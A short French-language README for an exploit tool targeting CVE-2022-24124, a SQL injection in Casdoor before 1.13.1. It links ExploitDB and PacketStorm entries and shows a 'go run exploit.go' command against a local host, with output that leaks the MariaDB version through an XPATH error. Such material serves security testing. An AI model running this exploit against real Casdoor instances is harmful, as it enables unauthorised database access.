
Extraire la version de la base de données SQL sur un hôte exécutant Casdoor < 1.13.1
Code d'exploit pour CVE-2022-24124 alias Casdoor SQL Injection
Liens d'exploit : [ExploitDB-50792] [PacketStormSecurity]
Résultat attendu : Extraire la version de la base de données SQL sur l'hôte exécutant Casdoor < 1.13.1
Destiné uniquement à des fins éducatives et de test dans des environnements d'entreprise.
Barricade➜ go run exploit.go -u http://127.0.0.1:8080
-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)
[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1